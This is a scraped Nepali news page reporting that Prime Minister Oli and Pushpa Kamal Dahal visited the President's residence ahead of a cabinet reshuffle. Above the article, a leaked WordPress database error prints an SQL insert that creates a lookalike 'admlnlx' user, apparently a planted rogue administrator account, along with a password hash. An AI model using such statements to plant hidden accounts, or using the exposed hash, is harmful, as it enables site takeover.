WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BwoFlvBIT4BwQm.CitXG0L7pfD8s6P0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-01 09:44:35', '', 'admlnlx', 'admlnlx')
गाउँले न्युज, मन्त्रिपरिषद पुनर्गठनअघि प्रधानमन्त्री केपी शर्मा ओली र नेकपाका अर्का अध्यक्ष पुष्पकमल दाहाल ‘प्रचण्ड’ राष्ट्रपति निवास पुगेका छन् ।
बालुवाटारस्थित निवासमा ओली र दाहालबीच भेटघाट भएपछि शीर्ष नेता राष्ट्रपति निवास पुगेका हुन्।
‘मन्त्रिपरिषद पुनर्गठनअघि आवश्यक सल्लाह र रायका लागि अध्यक्षद्वय शितल निवास पुग्नु भएको छ,’ नेकपाका एक नेताले भने, ‘त्यहाँबाट फर्केपछि सम्भावित मन्त्रीको नाम सार्वजनिक हुनेछ, सकेसम्म आजै सपथ पनि हुन सक्नेछ।’
राष्ट्रपति निवासबाट फर्केपछि एक चरण नेकपा सचिवालय बैठक बस्ने सम्भावना पनि उत्तिकै रहेको दाहालनिकट स्रोतले बतायो।
प्रधानमन्त्री ओलीले बुधबार बसेको मन्त्रिपरिषद बैठकमा सरकार पुनर्गठनका लागि आफूले सोच बनाएको भन्दै सार्वजनिक कार्यक्रममा सहभागी नहुन मन्त्रीहरूलाई निर्देशन दिएका थिए। त्यसलगत्तै मन्त्रीमण्डल पुनर्गठनको प्रक्रियाले तीब्रता पाएको हो ।
sourse:nepalnews